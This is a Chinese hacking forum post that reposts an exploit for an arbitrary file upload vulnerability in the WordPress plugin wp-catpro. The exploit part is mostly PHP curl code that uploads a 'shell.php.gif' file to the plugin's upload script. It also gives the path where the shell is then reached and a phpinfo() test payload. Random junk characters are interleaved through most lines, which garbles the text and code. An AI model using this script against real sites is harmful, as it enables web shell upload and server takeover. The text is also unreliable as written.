找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2186|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
# A4 `' _1 u  D- ~+ e5 |7 r#-----------------------------------------------------------------------; w8 s3 f" S: K$ p
$ I5 ?, J; Q2 M5 }
作者  => Zikou-16' |+ I' p  I1 O* I# q1 h" T& n) z
邮箱 => zikou16x@gmail.com- s4 I) X( k1 G& c
测试系统 : Windows 7 , Backtrack 5r3  [3 V8 M, F8 ?3 l
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
. w0 E1 o. C# p; o####. |4 W( Y& z* ^

# O5 d" ?/ Y9 _/ `#=> Exploit 信息:
. L& b/ y" B* c4 e4 K& D% @' ^$ i% k------------------9 j5 p8 x8 o! B$ K/ n
# 攻击者可以上传 file/shell.php.gif- {# f- x8 T% f9 ], R& L0 Q
# ("jpg", "gif", "png")  // Allowed file extensions6 x% v3 r; V9 M! ^: M/ M
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)) y# Z- x- d% ]. T8 V: R6 I0 Y
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)2 Q0 I2 g7 e: Z5 u0 W# W
------------------2 ?  ^1 E( W- [

5 x: A8 V5 r- r* N2 c$ C% _# l#=> Exploit
* d, p2 ~1 \! p1 v# `-----------
7 j4 F: f  i, w3 d- m! U<?php8 _1 x8 `8 C1 ]) u  n3 J

) Z" K! i# o% Q" J; ]$uploadfile="zik.php.gif";; J7 ~4 m6 x+ M; X
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
) ~5 y3 \  `* N* l4 ocurl_setopt($ch, CURLOPT_POST, true);/ g. f+ i8 b* P3 t7 _; t! ?2 n
curl_setopt($ch, CURLOPT_POSTFIELDS,
/ ?" q# Z+ Q" _# v7 f! E9 Aarray('Filedata'=>"@$uploadfile",
; b+ f& k* [$ `5 S: ]2 a9 I'folder'=>'/wp-content/uploads/catpro/'));
, s) W) e# j- z! `2 Y1 I' Qcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);5 _3 r1 @) F9 Q
$postResult = curl_exec($ch);
/ T* H3 ~9 v! j7 Mcurl_close($ch);! X6 L" r/ s: @8 h  Y: M

2 Z9 j3 G0 m: x. r/ Jprint "$postResult";  k9 ~  j" n$ G% n4 [7 K9 g
* X2 j9 J+ M& B1 M) {
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif# Z* \& L& J2 h; h2 Y
  ?>5 K3 n! c- I0 j
<?php6 m* z5 a; t& ~; G
phpinfo();
. R$ j' `) M3 j1 e  J$ T?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表